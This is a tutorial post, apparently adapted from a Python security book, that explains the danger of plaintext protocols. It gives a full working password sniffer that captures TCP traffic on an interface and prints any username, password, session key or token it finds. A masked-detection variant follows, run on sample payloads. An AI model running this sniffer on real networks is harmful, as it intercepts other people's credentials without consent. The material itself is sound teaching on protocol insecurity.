The internet, as well as local area networks, consists of a huge number of services. You use HTTP(S) for surfing web
pages, SMTP to send emails, POP3 or IMAP to read emails, ICQ, IRC, Skype or Jabber to chat, and so on.
Most people should by now have heard that HTTP without the S is insecure and should not be used to send one's
bank account data through the net. However, most protocols in daily use are plaintext protocols, like ICQ, SMTP and
IMAP/POP3. Facebook, the biggest social network of the world, has recently adopted HTTPS as default. One can activate
SSL encryption for most commonly used protocols, or install an SSL proxy in front of a service if it doesn't support
SSL by itself, but only a few people care about data security and encryption.
Unencrypted network traffic is the low-hanging fruit every attacker is searching for. Why should an attacker try
to crack passwords if he can easily read them?
Password Sniffer
The danger of unencrypted protocols can most effectively be demonstrated with the help of a password sniffer. Even
people who claim to "have nothing to hide" recognize that the interception of their username and password is an act
that endangers their privacy, and they would like to avoid it if possible. Therefore we will now write a program that
hunts for username and password combinations by matching predefined strings against the packet payload and dumps
them on the display. To do so, we adapt the source code of the simple sniffer.
```python
#!/usr/bin/python3
import sys
import re
import getopt
import pcapy
from impacket.ImpactDecoder import EthDecoder, IPDecoder, TCPDecoder

# interface to sniff on
dev = "wlan0"

# pcap filter
filter = "tcp"

# decoders for all layers
eth_dec = EthDecoder()
ip_dec = IPDecoder()
tcp_dec = TCPDecoder()

# pattern that matches usernames, passwords and other credential fields
# (the keyword, a separator, then the rest of the line)
pattern = re.compile(r"""(?P<found>(USER|USERNAME|PASS|PASSWORD|LOGIN|BENUTZER|AUTH|ACCESS|ACCESS_?KEY|SESSION|SESSION_?KEY|TOKEN)[=:\s].+)""",
                     re.MULTILINE | re.IGNORECASE)

# This function will be called for every packet, decode it and
# try to find a username or password in it.
def handle_packet(hdr, data):
    eth_pkt = eth_dec.decode(data)
    ip_pkt = ip_dec.decode(eth_pkt.get_data_as_string())
    tcp_pkt = tcp_dec.decode(ip_pkt.get_data_as_string())
    # get_data_as_string() returns bytes under Python 3; decode them so the
    # str pattern can be applied (undisplayable bytes become U+FFFD)
    payload = ip_pkt.get_data_as_string().decode("ascii", errors="replace")
    match = re.search(pattern, payload)

    # skip segments that only carry connection setup or teardown flags
    if not tcp_pkt.get_SYN() and not tcp_pkt.get_RST() and \
       not tcp_pkt.get_FIN() and match and \
       match.groupdict()['found'] is not None:
        print("%s:%d -> %s:%d" % (ip_pkt.get_ip_src(),
                                  tcp_pkt.get_th_sport(),
                                  ip_pkt.get_ip_dst(),
                                  tcp_pkt.get_th_dport()))
        print("\t%s\n" % (match.groupdict()['found']))

def usage():
    print(sys.argv[0] + " -i <dev> -f <pcap_filter>")
    sys.exit(1)

# parsing parameters
try:
    cmd_opts = "f:i:"
    opts, args = getopt.getopt(sys.argv[1:], cmd_opts)
except getopt.GetoptError:
    usage()

for opt in opts:
    if opt[0] == "-f":
        filter = opt[1]
    elif opt[0] == "-i":
        dev = opt[1]
    else:
        usage()

# start sniffing: snaplen 1500 bytes, non-promiscuous, 100 ms read timeout
pcap = pcapy.open_live(dev, 1500, 0, 100)
pcap.setfilter(filter)
print("Sniffing passwords on " + str(dev))
pcap.loop(10, handle_packet)   # handle 10 packets; 0 would loop forever
```
This time we filter TCP traffic, because the author is not aware of any UDP-based
protocols that have a login or authentication mechanism.
Besides the EthDecoder we define an IPDecoder and a TCPDecoder to extract
the IP and TCP headers inside the function handle_packet. Each decoder is given
the payload of the previous layer: the IPDecoder gets the payload of the Ethernet
frame, the TCPDecoder the payload of the IP packet, and so forth. The payload of
the IP packet can be accessed as an ASCII string with the help of the method
get_data_as_string(), which sometimes leads to ugly undisplayable characters,
especially when dumping binary data. Therefore we first match the payload
against a regular expression (Sect. 3.9) to make sure it contains a string
like User, Pass, Password or Login. In contrast to regular password sniffers,
our sniffer does not just search in predefined protocols but in all TCP
traffic, and it tries to detect other authentication mechanisms like session keys
and cookies besides username and password combinations.
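To exercise the matching logic without a live interface, here is an added example (my code, not the post's) that runs the same credential keywords over constructed sample payloads as raw bytes and masks each value, so the result can be logged as an alert that plaintext credentials crossed the wire without recording the secret itself.

```python
import re

# Same credential keywords as the sniffer above, here as a bytes pattern with the
# field name and value captured separately; the value stops at end of line or
# at '&' so URL-encoded form fields are reported one by one.
CRED_PATTERN = re.compile(
    rb"(?P<key>USER|USERNAME|PASS|PASSWORD|LOGIN|BENUTZER|AUTH|ACCESS|ACCESS_?KEY|"
    rb"SESSION|SESSION_?KEY|TOKEN)[=:\s](?P<value>[^\r\n&]+)",
    re.IGNORECASE,
)


def find_plaintext_credentials(payload: bytes):
    """Return (FIELD, masked value) pairs for credential-looking fields in a payload.

    Works directly on bytes, so binary payloads neither raise nor need decoding,
    and masks each value so an alert can be logged without storing the secret.
    """
    hits = []
    for m in CRED_PATTERN.finditer(payload):
        key = m.group("key").decode("ascii", errors="replace").upper()
        value = m.group("value").decode("ascii", errors="replace").strip()
        masked = value[:2] + "*" * max(len(value) - 2, 0)
        hits.append((key, masked))
    return hits


# Constructed sample payloads (not real captures): a POP3 login, an HTTP form
# post, and a binary blob that must produce no hits.
SAMPLES = {
    "pop3": b"USER alice\r\nPASS s3cret!\r\n",
    "http": b"POST /signin HTTP/1.1\r\nHost: example.invalid\r\n\r\n"
            b"login=bob&password=hunter2",
    "binary": bytes(range(256)),
}

if __name__ == "__main__":
    for name, payload in SAMPLES.items():
        print(name, find_plaintext_credentials(payload))
```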
I hope you liked this post; if so, don't forget to share it.
Thank you so much :-)